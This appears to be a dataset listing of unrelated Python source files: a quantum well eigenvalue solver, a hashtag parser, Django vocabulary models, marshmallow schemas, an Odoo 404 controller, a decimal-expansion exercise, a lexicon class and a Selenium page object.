Psi[j+1] = (2 - dz**2*(epsilon_trial-W[j+1]))*Psi[j] - Psi[j-1]
# Normalizing
Psi /= sqrt(scipy.integrate.simps(abs(Psi)**2,dx=1e-3))
# Store value of last element in Psi
Psi_end = abs(Psi[-1])
# Check if last element is within tolerance
if Psi_end < tol:
epsilon.append(epsilon_trial)
lastpsi.append(Psi_end)
Psi_list.append(list(Psi)) # add as list to make it behave well
# Only keep those epsilon and Psi giving minimal value of Psi[-1]
if len(lastpsi) > 1 and (epsilon[-1] - epsilon[-2]) < 2:
if lastpsi[-1] < lastpsi[-2]:
lastpsi.remove(lastpsi[-2])
epsilon.remove(epsilon[-2])
Psi_list.remove(Psi_list[-2])
if lastpsi[-1] > lastpsi[-2]:
lastpsi.remove(lastpsi[-1])
epsilon.remove(epsilon[-1])
Psi_list.remove(Psi_list[-1])
# Update trial eigenvalue
epsilon_trial += 0.4
# Physical energies
for i in range(0,len(epsilon)):
eps = epsilon[i]
E_phys = eps*hbarc**2/(2*mc2*a**2)
E.append(E_phys)
# ANALYTIC SOLUTIONS
num = [1,2,3,4]
# Determining energy and wavefunction:
for n in num:
E_physical = n**2*hbarc**2*pi**2/(2*mc2*a**2)
E_n.append(E_physical)
Psi_anal = sin(pi*z*n)
# Normalizing:
Psi_anal /= sqrt(scipy.integrate.simps(abs(Psi_anal)**2,dx=1e-3))
plot(z,Psi_anal,'k--')
# Print lists of energies
print '-------------------------------------------------------------------------------------------------'
print 'Energy levels of infinite potential well of width %.2f nm:' %a
print '-------------------------------------------------------------------------------------------------'
print 'Epsilon: ',epsilon
print 'Numerical energies E [eV]: ', E
print 'Analytical energies En [eV]: ', E_n
print '-------------------------------------------------------------------------------------------------'
# Plotting
for i in range(len(Psi_list)):
Legend = '$\psi_%d$' % (number)
plot(z,Psi_list[i],color=colors[color_index],label=Legend)
number += 1
color_index += 1
# Axes and title
plt.title('$Infinite \ well$',size=20)
plt.xlabel('$z = x/a$',size=18)
plt.ylabel('$\psi(z)$',size=18)
plot([0,0],[0,0],'k--',label='$Analytical$')
plt.legend(loc='best')
show() |
15,193 | 3c353924ea97480994f92eb71a614205c1703e48 | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 11:27:23 2018
@author: Saverio
"""
import re
testString = "Questo è un esempio di #tag che voglio #individuare per assegnare ad @ale cosa fare come @compito"
def parseHastags(intext):
    """Return every '#tag' occurrence in intext, '#' included, in order."""
    # '#' followed by zero or more word characters.
    return re.findall(r'#\w*', intext)
def parseAssignations(intext):
    """Return every '@name' assignation in intext, '@' included, in order."""
    # '@' followed by zero or more word characters.
    return re.findall(r'@\w*', intext)
def cleantext(intext):
    """Return intext with every '@' and '#' marker character removed.

    Used to strip hashtag/assignation markers from a task description.
    """
    # BUG FIX: a per-character debug print() inside the loop spammed
    # stdout on every call; it has been removed. Return value unchanged.
    return ''.join(ch for ch in intext if ch != '@' and ch != '#')
def parseValidInputs(validEntryToParse, userInput):
    """Validate userInput against the letters marked '(x)' in a prompt.

    Tokens in parentheses are extracted from validEntryToParse; for each
    single-case token the opposite-case variant is also accepted.
    Returns userInput when it is one of the accepted tokens, else False.
    """
    # The valid options are written in parentheses, e.g. "(Y)es / (n)o".
    options = [token.strip('(').strip(')')
               for token in re.findall(r'\(\w*\)', validEntryToParse)]
    # Accept both cases: add the lower/upper twin of each original token.
    for opt in list(options):
        if opt.isupper():
            if opt.lower() not in options:
                options.append(opt.lower())
        elif opt.islower():
            if opt.upper() not in options:
                options.append(opt.upper())
    if userInput in options:
        return userInput
    return False
hastags = parseHastags(testString)
assignations = parseAssignations(testString)
testoPulito = cleantext(testString)
|
15,194 | 959dd85e4090579ea181b9325fa83d7bf81ce5ed | from django.db import models
from django.contrib.auth.models import User
DEFAULT_TITLE = 'Teksti'
class Word(models.Model):
    """Word with its translation and some linguistic properties."""
    # Gender choices
    FEMININE = 'f'
    MASCULINE = 'm'
    NEUTER = 'n'
    # Part-of-speech tags as in spacy.io annotation
    ADJECTIVE = 'ADJ'
    ADPOSITION = 'ADP'
    ADVERB = 'ADV'
    AUXILIARY = 'AUX'
    CONJUNCTION = 'CONJ'
    CCONJUNCTION = 'CCONJ'
    DETERMINER = 'DET'
    INTERJECTION = 'INTJ'
    NOUN = 'NOUN'
    NUMERAL = 'NUM'
    PARTICLE = 'PART'
    PRONOUN = 'PRON'
    PROPERNOUN = 'PROPN'
    SCONJUNCTION = 'SCONJ'
    SYMBOL = 'SYM'
    VERB = 'VERB'
    OTHER = 'X'
    SPACE = 'SPACE'
    # Language choices (ISO 639-1 codes)
    FRENCH = 'fr'
    FINNISH = 'fi'
    ITALIAN = 'it'
    ENGLISH = 'en'

    GENDER_CHOICES = (
        (FEMININE, 'Feminine'),
        (MASCULINE, 'Masculine'),
        (NEUTER, 'Neuter'),
    )
    POS_CHOICES = (
        (ADJECTIVE, 'Adjective'),
        (ADPOSITION, 'Adposition'),
        (ADVERB, 'Adverb'),
        (AUXILIARY, 'Auxiliary'),
        (CONJUNCTION, 'Conjunction'),
        (CCONJUNCTION, 'Coordinating conjunction'),
        (DETERMINER, 'Determiner'),
        (INTERJECTION, 'Interjection'),
        (NOUN, 'Noun'),
        (NUMERAL, 'Numeral'),
        (PARTICLE, 'Particle'),
        (PRONOUN, 'Pronoun'),
        (PROPERNOUN, 'Proper noun'),
        (SCONJUNCTION, 'Subordinating conjunction'),
        (SYMBOL, 'Symbol'),
        (VERB, 'Verb'),
        (OTHER, 'Other'),
        (SPACE, 'Space'),
    )
    LANGUAGE_CHOICES = (
        (FRENCH, 'French'),
        (FINNISH, 'Finnish'),
        (ITALIAN, 'Italian'),
        (ENGLISH, 'English'),
    )

    lemma = models.CharField(max_length=255)
    translation = models.CharField(max_length=255)
    pos = models.CharField(
        max_length=5, choices=POS_CHOICES, verbose_name='Part-of-speech'
    )
    gender = models.CharField(max_length=1, choices=GENDER_CHOICES, null=True)
    pronunciation = models.CharField(max_length=255, null=True)
    source_lang = models.CharField(
        max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Source language'
    )
    target_lang = models.CharField(
        max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Target language'
    )
    created_date = models.DateTimeField(auto_now_add=True)
    created_by = models.ForeignKey(
        User,
        on_delete=models.SET_NULL,
        null=True,
        related_name='word_created_by'
    )
    modified_date = models.DateTimeField(auto_now=True, null=True)
    modified_by = models.ForeignKey(
        User,
        on_delete=models.SET_NULL,
        null=True,
        related_name='word_modified_by'
    )

    class Meta:
        ordering = ['lemma']
        # One entry per (lemma, pos, gender) pair of languages.
        unique_together = [
            'lemma',
            'pos',
            'gender',
            'target_lang',
            'source_lang'
        ]

    def __str__(self):
        # e.g. "chat (NOUN) -> cat"
        return self.lemma + ' (' + self.pos + ') -> ' + self.translation
class Chapter(models.Model):
    """Analyzed text, linked to its vocabulary through WordProperties."""
    # Language choices (ISO 639-1 codes)
    FRENCH = 'fr'
    FINNISH = 'fi'
    ITALIAN = 'it'
    ENGLISH = 'en'

    LANGUAGE_CHOICES = (
        (FRENCH, 'French'),
        (FINNISH, 'Finnish'),
        (ITALIAN, 'Italian'),
        (ENGLISH, 'English'),
    )

    title = models.CharField(max_length=255, default=DEFAULT_TITLE)
    body = models.TextField()
    public = models.BooleanField(default=False)  # visible to other users when True
    created_date = models.DateTimeField(auto_now_add=True)
    modified_date = models.DateTimeField(auto_now=True)
    created_by = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        related_name='chapter_created_by'
    )
    modified_by = models.ForeignKey(
        User,
        on_delete=models.CASCADE,
        null=True,
        related_name='chapter_modified_by'
    )
    # Vocabulary of the chapter; WordProperties carries token/frequency.
    words = models.ManyToManyField('Word', through='WordProperties')
    source_lang = models.CharField(
        max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Source language'
    )
    target_lang = models.CharField(
        max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Target language'
    )

    class Meta:
        ordering = ['public', 'title']

    def __str__(self):
        # Title plus the first 50 characters of the body.
        return self.title + ': ' + self.body[:50] + '...'

    def summary(self):
        """Return the first 100 characters of the body."""
        return self.body[:100]
class WordProperties(models.Model):
    """Word information related to a chapter; the through-model of
    Chapter.words."""
    word = models.ForeignKey('Word', on_delete=models.CASCADE)
    token = models.CharField(max_length=255, default='', blank=True)  # surface form in the chapter
    frequency = models.IntegerField(default=0)  # occurrences within the chapter
    chapter = models.ForeignKey('Chapter', on_delete=models.CASCADE)

    class Meta:
        verbose_name_plural = 'Word Properties'
class LearningData(models.Model):
    """Words that a user has practiced, with their learned status."""
    word = models.ForeignKey('Word', on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    learned = models.BooleanField(default=False)

    class Meta:
        verbose_name_plural = 'Learning Data'
        ordering = ['word']
        # At most one record per (word, user) pair.
        unique_together = ['word', 'user']
15,195 | 43a97eaf4c3a6ff9eb451b901fb281d051874cdf | from marshmallow_jsonapi.flask import Schema
from marshmallow_jsonapi import fields
class SchemaAirState(Schema):
    """JSON:API schema for an air-state measurement (temperature and
    humidity with location/device metadata)."""
    class Meta:
        type_ = 'air_state'
        self_view = 'air_state_detail'
        self_view_kwargs = {'id': '<id>'}
        self_view_many = 'air_state_list'

    # id = fields.Integer(as_string=True, dump_only=True)  # make troubles during update.
    # Writable id so the client may omit/null it on create.
    id = fields.Integer(as_string=True, required=False, missing=None, allow_none=True)
    temperature = fields.Decimal(required=True)
    humidity = fields.Decimal(required=True)
    location = fields.Str(required=True)
    device = fields.Str(required=True)
    created = fields.DateTime(format="%Y-%m-%d %H:%M:%S")
class SchemaInsolation(Schema):
    """JSON:API schema for an insolation reading with device metadata."""
    class Meta:
        type_ = 'insolation'
        self_view = 'insolation_detail'
        self_view_kwargs = {'id': '<id>'}
        self_view_many = 'insolation_list'

    # id = fields.Integer(as_string=True, dump_only=True)  # make troubles during update.
    # Writable id so the client may omit/null it on create.
    id = fields.Integer(as_string=True, required=False, missing=None, allow_none=True)
    insolation = fields.Integer(required=True)
    device = fields.Str(required=True)
    created = fields.DateTime(format="%Y-%m-%d %H:%M:%S")
|
15,196 | be35b04d005fec53f002d455681474780de1dcf0 | # -*- coding: utf-8 -*-
import logging
from odoo import http
from odoo.http import request
from odoo.addons.website.controllers.main import Website
import requests
logger = logging.getLogger(__name__)
class WebsiteReload(Website):
    """Website controller serving a custom page when an upstream server
    cannot be found."""

    @http.route('/server-not-found', type='http', auth="public", website=True)
    def reload(self, **kw):
        """Render the custom 404 page.

        The not_found_host/scheme/server values are forwarded to the
        template only when all three appear in the query string.
        """
        not_found_host = not_found_scheme = not_found_server = None
        # url = request.httprequest.headers.get('Referer')
        url = request.httprequest.url
        query = requests.utils.urlparse(url).query
        # NOTE(review): raises ValueError if a query fragment has no '='.
        params = dict(x.split('=') for x in query.split('&'))
        if 'not_found_host' in params and 'not_found_scheme' in params and \
                'not_found_server' in params:
            not_found_host = params['not_found_host']
            not_found_scheme = params['not_found_scheme']
            # BUG FIX: previously copied params['not_found_scheme'] here,
            # so the server value was never passed to the template.
            not_found_server = params['not_found_server']
        values = {
            'not_found_host': not_found_host,
            'not_found_scheme': not_found_scheme,
            'not_found_server': not_found_server
        }
        return request.render("redirect_page.404_custom", values)
|
15,197 | 7ef9402cc6759b5659d4df466df31d858f530d7b | # Written by *** and Eric Martin for COMP9021
'''
Prompts the user for two strictly positive integers, numerator and denominator.
Determines whether the decimal expansion of numerator / denominator is finite or infinite.
Then computes integral_part, sigma and tau such that numerator / denominator is of the form
integral_part . sigma tau tau tau ...
where integral_part is an integer, sigma and tau are (possibly empty) strings of digits,
and sigma and tau are as short as possible.
'''
import math
import sys
from math import gcd
from math import sqrt
# --- Read and validate input: exactly two strictly positive integers ---
try:
    numerator, denominator = input('Enter two strictly positive integers: ').split()
except ValueError:
    print('Incorrect input, giving up.')
    sys.exit()
try:
    numerator, denominator = int(numerator), int(denominator)
    if numerator <= 0 or denominator <= 0:
        raise ValueError
except ValueError:
    print('Incorrect input, giving up.')
    sys.exit()
# sigma holds the non-repeating fractional digits, tau the repeating block.
has_finite_expansion = False
sigma = ''
tau = ''
integral_part=0
if numerator % denominator == 0:
    # Exact division: no fractional digits at all.
    has_finite_expansion = True
    integral_part=int(numerator / denominator)
else:
    # Reduce the fraction first so long-division remainders are canonical.
    transform = gcd(numerator, denominator)
    numerator_gcd = int(numerator / transform)
    denominator_gcd = int(denominator / transform)
    integral_part=str(int(numerator // denominator))
    # L: digits produced so far (starts with the integer part);
    # l: digits collected once a remainder has repeated (candidate period);
    # L_1: every remainder seen; L_2: remainders seen a second time.
    L=[]
    l=[]
    L_1=[]
    L_2=[]
    new_numerator=numerator_gcd
    L.append(int(new_numerator//denominator_gcd))
    # Long division: multiply each remainder by 10 and divide, watching the
    # remainder sequence to detect when the digits start repeating.
    while True:
        numerator_temp = int(new_numerator% denominator_gcd)*10
        p=int(new_numerator % denominator_gcd)
        q=int(new_numerator // denominator_gcd)
        L_1.append(p)
        if int(numerator_temp)==0:
            # Remainder reached zero: the expansion terminates.
            # NOTE(review): this print looks like leftover debug output —
            # confirm before removing.
            print(int(new_numerator% denominator_gcd))
            has_finite_expansion = True
            # NOTE(review): deriving the digits from the float value of
            # numerator/denominator loses precision for long expansions —
            # verify against the digits already accumulated in L.
            decimal=(numerator/denominator)-(numerator // denominator)
            decimal_str=str(decimal)[2::]
            integral_part= int(numerator // denominator)
            sigma= decimal_str
            break
        else:
            if len(set(L_1))==len(L_1):
                # Remainder not seen before: still in the non-repeating part.
                L.append(int(numerator_temp//denominator_gcd))
                new_numerator = numerator_temp
            else:
                L_2.append(p)
                if len(set(L_2))==len(L_2):
                    # Remainder repeated once: we are now inside the period.
                    l.append(int(numerator_temp // denominator_gcd))
                    new_numerator = numerator_temp
                else:
                    # A remainder repeated a second time: the full period has
                    # been seen. Render the digit lists as strings (stripping
                    # the "[ , ]" punctuation from str(list)) and slice out
                    # sigma (after the integer part) and tau (the period).
                    sigema_temp=''.join(str(L))
                    sigema_temp=sigema_temp.replace(",","")
                    sigma=sigema_temp.replace(" ","")[len(integral_part)+1:len(L)-len(l)+1]
                    tau_temp=''.join(str(l))
                    tau_temp=tau_temp.replace(",","")
                    tau=tau_temp.replace(" ","")[1:len(l)+1]
                    break
# --- Report the result ---
if has_finite_expansion:
    print(f'\n{numerator} / {denominator} has a finite expansion')
else:
    print(f'\n{numerator} / {denominator} has no finite expansion')
if not tau:
    if not sigma:
        print(f'{numerator} / {denominator} = {integral_part}')
    else:
        print(f'{numerator} / {denominator} = {integral_part}.{sigma}')
else:
    print(f'{numerator} / {denominator} = {integral_part}.{sigma}({tau})*')
|
15,198 | 80b8d696ddc5f3e19eb3525937228eacba5a59c6 | from collections import defaultdict
"""
DEPRECATED. Using NLTK libraries now.
See pseudo_parser, stmt_parser and stmt_classifier.
"""
class Lexicon:
    '''Simple default implementation of a lexicon, which scores word,
    tag pairs with a smoothed estimate of P(tag|word)/P(tag).'''

    def __init__(self, trainTrees):
        """Build the lexicon from the (word, tag) pairs observed in *trainTrees*.

        Each tree must provide getYield() (the words) and
        getPreTerminalYield() (the corresponding preterminal tags).
        """
        self.wordToTagCounters = defaultdict(float)
        self.totalTokens = 0.0
        self.totalWordTypes = 0.0
        self.tagCounter = defaultdict(float)
        self.wordCounter = defaultdict(float)
        self.typeTagCounter = defaultdict(float)
        for trainTree in trainTrees:
            words = trainTree.getYield()
            tags = trainTree.getPreTerminalYield()
            # BUG FIX: the original used Python 2's xrange() and read
            # `tag[position]` before `tag` was ever bound (NameError).
            # Iterating the word/tag pairs directly fixes both.
            for word, tag in zip(words, tags):
                self.tallyTagging(word, tag)

    def tallyTagging(self, word, tag):
        """Record one (word, tag) observation in all the counters."""
        if not self.isKnown(word):
            # First occurrence of this word type: credit the tag with one
            # "new word type" observation, used for unknown-word smoothing.
            self.totalWordTypes += 1
            self.typeTagCounter[tag] += 1
        self.totalTokens += 1
        self.tagCounter[tag] += 1
        self.wordCounter[word] += 1
        self.wordToTagCounters[(word, tag)] += 1

    def isKnown(self, word):
        """Return True if *word* was seen during training."""
        # Direct membership test (the original built .keys() first).
        return word in self.wordCounter

    def getAllTags(self):
        """Return the tags observed during training."""
        # BUG FIX: the original referenced the bare name `tagCounter`
        # (NameError); it must go through self.
        return self.tagCounter.keys()

    def scoreTagging(self, word, tag):
        """Return a smoothed score for tagging *word* with *tag*.

        Computes p(tag|word) / p(tag) * p(word) with add-one smoothing on
        the word count; rare/unknown words (count < 10) additionally borrow
        mass from the per-tag new-word-type counts.
        """
        p_tag = self.tagCounter[tag] / self.totalTokens
        c_word = self.wordCounter[word]
        c_tag_and_word = self.wordToTagCounters[(word, tag)]
        if c_word < 10:  # rare or unknown
            c_word += 1
            c_tag_and_word += self.typeTagCounter[tag] / self.totalWordTypes
        p_word = (1.0 + c_word) / (self.totalTokens + self.totalWordTypes)
        p_tag_given_word = c_tag_and_word / c_word
        return p_tag_given_word / p_tag * p_word
|
15,199 | a380b9726afdb86864a3b1b8afe96086928ce7f0 | import time
from selenium.webdriver.common.by import By
from base_page_object import BasePage
from nose.tools import assert_equal, assert_true
class CreateTaskPage(BasePage):
    """Page object for the "Set a task" modal."""

    locator_dictionary = {
        "create_task_header": (By.XPATH, "//span[.='Set a task']"),
        "task_name_field": (By.XPATH, "//input[@name='description']"),
        "low_field": (By.XPATH, "//input[@value='3']"),
        "medium_field": (By.XPATH, "//input[@value='2']"),
        "high_field": (By.XPATH, "//input[@value='1']"),
        "select_done": (By.XPATH, "//div[@class='ant-modal-body']//button[@role='switch']"),
        "save_button": (By.XPATH, "//button[contains(.,'Save')]")
    }

    def __init__(self, context):
        BasePage.__init__(self, context.browser)

    def create_task(self, value):
        """Create a task named "Task_<value>" with the priority named by
        *value* ("low", "medium" or "high"); other values set no priority."""
        time.sleep(5)
        self.task_name_field.send_keys("Task_%s" % value)
        # Map the priority name to its field attribute instead of an
        # if/elif ladder; only the selected attribute is ever accessed.
        attr = {"low": "low_field",
                "medium": "medium_field",
                "high": "high_field"}.get(value)
        if attr is not None:
            getattr(self, attr).click()
        self.select_done.click()
        self.save_button.click()
        time.sleep(5)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.